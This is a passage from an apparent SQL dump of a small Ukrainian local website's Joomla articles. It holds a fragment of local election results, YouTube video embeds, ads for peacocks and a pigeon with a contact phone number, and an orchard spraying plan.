0.75pt;\">&nbsp;</td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">2</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Гавриленко Володимир Михайлович</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">Громадянин України, народився 28.05.1958 р., освіта загальна середня, безпартійний, ФОП, місце проживання: м.Малин</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">41</span></td>\r\n<td style=\"border: 1pt solid windowtext; padding: 0.75pt;\"><span style=\"font-size: 10pt; line-height: 107%; font-family: \'Calibri Light\',\'sans-serif\';\">13,9456</span></td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,61,'2015-11-04 12:31:50',430,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2015-11-04 12:31:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,4,'','',1,1490,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(1295,1561,'ВИСТАВКА РОБІТ ПРАЦІВНИКІВ УПРАВЛІННЯ ПФУ В МАЛИНСЬКОМУ РАЙОНІ, ПРИСВЯЧЕНА 25 РІЧЧЮ ЗАСНУВАННЯ ПЕНСІЙНОГО ФОНДУ УКРАЇНИ.','vistavka-robit-pratsivnikiv-upravlinnya-pfu-v-malinskomu-rajoni-prisvyachena-25-richchyu-zasnuvannya-pensijnogo-fondu-ukrajini','<iframe width=\"640\" height=\"360\" src=\"https://www.youtube.com/embed/WP-Hxzjw_xA?rel=0\" frameborder=\"0\" allowfullscreen></iframe> ','',1,8,'2015-12-18 12:04:16',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2015-12-18 12:04:16','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,49,'','',1,928,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(1346,1643,'За матеріалами ТРС \"ПОЛІССЯ\"','za-materilami-trs-polissya',' <iframe width=\"640\" height=\"480\" src=\"https://www.youtube.com/embed/cVJn2i2YC5I?rel=0\" frameborder=\"0\" allowfullscreen></iframe>','',1,8,'2016-01-15 13:04:14',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2016-01-15 13:04:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,48,'','',1,837,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(1408,1711,'Центр Малина з висоти пташиного польоту в подачі Анатолія Ястремського','tsentr-malina-z-visoti-ptashinogo-polotu-v-podachi-anatoliya-yastremskogo','<iframe width=\"640\" height=\"360\" src=\"https://www.youtube.com/embed/JHeF1z8B78c?rel=0\" frameborder=\"0\" allowfullscreen></iframe> ','',1,8,'2016-04-05 05:03:09',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2016-04-05 05:03:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,47,'','',1,782,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(1472,1780,'Малин з висоти пташиного польоту в подачі Олександра Скуратівського','malin-z-visoti-ptashinogo-polotu-v-podachi-oleksandra-skurativskogo','<iframe width=\"640\" height=\"360\" src=\"https://www.youtube.com/embed/5Nb3S75-WlE?rel=0\" frameborder=\"0\" allowfullscreen></iframe> ','',1,8,'2016-06-19 18:36:19',430,'','2020-10-19 18:48:26',430,0,'0000-00-00 00:00:00','2016-06-19 18:36:19','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,46,'','',1,769,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2449,2851,'Пара молодих чорних павлінів','prodaetsya-para-molodikh-chornikh-pavliniv','<p style=\"text-align: left;\"><span style=\"font-family: Times New Roman,Times; font-size: 14px;\">Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. За пару 260, телефонуйте, домовимось.</span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 14px;\">Відео за посиланням:&nbsp;</span> &nbsp;&nbsp;<a href=\"http://www.youtube.com/watch?v=4hiex0SmVHI\">http://www.youtube.com/watch?v=4hiex0SmVHI</a></p><p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/gl_0001_960x640.jpg\"><br></p><p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/gl_0006_960x640.jpg\"><br></p>','',1,128,'2020-08-30 14:06:44',430,'','2020-08-30 14:31:09',430,0,'0000-00-00 00:00:00','2020-08-30 14:06:44','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,3,'','',1,142,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2450,2852,'Білі павліни','bili-pavlini','<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;\">В наявності дві голубки та один самець. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 150, телефонуйте, домовимось.</p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;\">Відео за посиланнями:&nbsp;</p><p><a href=\"https://www.youtube.com/watch?v=cAx8y_06ulk\"><!--StartFragment-->https://www.youtube.com/watch?v=cAx8y_06ulk</a><!--EndFragment--></p><p><a href=\"https://www.youtube.com/watch?v=oCgoVVd8ZdY\"><!--StartFragment-->https://www.youtube.com/watch?v=oCgoVVd8ZdY</a><!--EndFragment--></p><p><a href=\"https://www.youtube.com/watch?v=bU8wTAB0tqY\"><!--StartFragment-->https://www.youtube.com/watch?v=bU8wTAB0tqY</a><!--EndFragment--></p><p><img src=\"https://malehus.in.ua/images/stories/gl_0021_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><br></p><p><img src=\"https://malehus.in.ua/images/stories/gl_0012_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><br></p><p><img src=\"https://malehus.in.ua/images/stories/gl_0011_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><br></p><p><br></p><!--EndFragment-->','',1,128,'2020-08-30 14:38:39',430,'','2020-08-30 14:40:49',430,0,'0000-00-00 00:00:00','2020-08-30 14:38:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,2,'','',1,138,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2451,2853,'Чорнохвоста самка павліна','chornokhvosta-samka-pavlina','<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">В наявності самка 2019 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч. По 180, телефонуйте, домовимось.</p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">Відео за посиланнями:&nbsp;<!--StartFragment--><a href=\"https://www.youtube.com/watch?v=NSxpoY-04GY\">https://www.youtube.com/watch?v=NSxpoY-04GY</a><!--EndFragment--></p><p><img src=\"https://malehus.in.ua/images/stories/gl_0018_960x640.jpg\" alt=\"\" class=\"fr-dii fr-fin\"><br></p><p><br></p><!--EndFragment-->','',1,128,'2020-08-30 14:44:50',430,'','2020-08-30 14:44:50',0,0,'0000-00-00 00:00:00','2020-08-30 14:44:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,126,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2452,2854,'Голуб поштовий самка','golub-poshtovij-samka','<!--StartFragment--><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">В наявності самка 2011 року. Є можливість передати маршрутками в Київ, Житомир, Бердичів, Вінницю, Овруч,&nbsp;<!--StartFragment-->Хмельник.&nbsp;По 150, телефонуйте, домовимось.</p><p style=\"margin: 13px 0px; padding: 0px; color: rgb(41, 43, 39); font-family: Arial, &amp;quot;Arial Unicode MS&amp;quot;, Helvetica, sans-serif; font-size: 13px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; background-color: rgb(255, 255, 255);\">Відео за посиланнями:&nbsp;<a href=\"https://www.youtube.com/watch?v=HjJWphPw8ZM\"><!--StartFragment-->https://www.youtube.com/watch?v=HjJWphPw8ZM</a><!--EndFragment--></p><p><img alt=\"\" class=\"fr-dii fr-fin\" src=\"https://malehus.in.ua/images/stories/gl_0026_960x640.jpg\"><br></p><!--EndFragment-->','',1,126,'2020-08-30 14:48:33',430,'','2020-09-10 17:11:57',430,0,'0000-00-00 00:00:00','2020-08-30 14:48:33','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,11,'','',1,204,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2453,2855,'У павлінів та кінгів банний день','u-pavliniv-ta-kingiv-bannij-den','<p><span contenteditable=\"false\" class=\"f-video-editor fr-fvn fr-tnv\"><iframe width=\"640\" height=\"360\" src=\"//www.youtube.com/embed/0U9GZJRK4Q8\" frameborder=\"0\" allowfullscreen=\"\"></iframe></span></p>','',1,127,'2020-08-30 14:54:03',430,'','2020-08-30 14:54:03',0,0,'0000-00-00 00:00:00','2020-08-30 14:54:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,4,'','',1,26,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2454,2856,'Календарний план догляду за садом','kalendarnij-plan-doglyadu-za-sadom','<p style=\"text-align: left;\"><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong><img alt=\"\" class=\"fr-fil fr-dii\" src=\"https://malehus.in.ua/images/stories/sad_chereshn.jpg\">Користуюсь більше п\'яти років. Велика перевага даного календарного плану:</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong> - препарати розраховано на 10 літрів води ( типовий бачок для оприскування);</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong>- препарати сумісні для&nbsp; змішування;</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong>- препарати поширені та доступні в торгівельній мережі;</strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\"><strong>- норми внесення препаратів подано: назва препарату та відповідно до черговості в переліку кількість. </strong></span></p><p><span style=\"font-family: Times New Roman,Times; font-size: 16px;\">Наприклад:&nbsp;','</span></p><p>&nbsp;<strong>Матч 050  ЕС + Скор 250 ЕС + Хорус 75 WG + Тиовид Джет 80WG<br>  (8 мл +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;2 мл +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;3 гр +&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 50 гр)&nbsp; &nbsp;</strong></p>',1,123,'2020-08-30 15:12:49',430,'','2020-08-31 17:06:49',430,0,'0000-00-00 00:00:00','2020-08-30 15:12:49','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,'','',1,96,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(2455,2860,'контактна інформація','380508320922','<p><span style=\"font-size: 16px;\"><strong>Житомирська область, м.Малин</strong></span></p><p><span style=\"font-size: 16px;\"><strong>дзвоніть:&nbsp; +380508320922</strong></span></p><p><br></p><p><span style=\"font-size: 16px;\"><strong>Telegram: 0508320922</strong></span></p>','',1,129,'2020-08-30 16:58:09',430,'','2022-07-24 06:53:53',430,0,'0000-00-00 00:00:00','2020-08-30 16:58:09','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,'','',1,37,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(2456,2863,'Процик Ілля Дмитрович - мій дідусь, знав секрет довголіття та любив розповідати народні байки','protsik-illya-dmitrovich-mij-didus-znav-sekret-dovgolittya-ta-lyubiv-rozpovidati-narodni-bajki','<p><span contenteditable=\"false\" class=\"f-video-editor fr-fvn fr-tnv\"><iframe width=\"640\" height=\"360\" src=\"//www.youtube.com/embed/MtgeGi_sDSw\" frameborder=\"0\" allowfullscreen=\"\"></iframe></span></p>','',1,134,'2020-08-30 17:57:59',430,'','2020-08-30 17:57:59',0,0,'0000-00-00 00:00:00','2020-08-30 17:57:59','0000-00-00 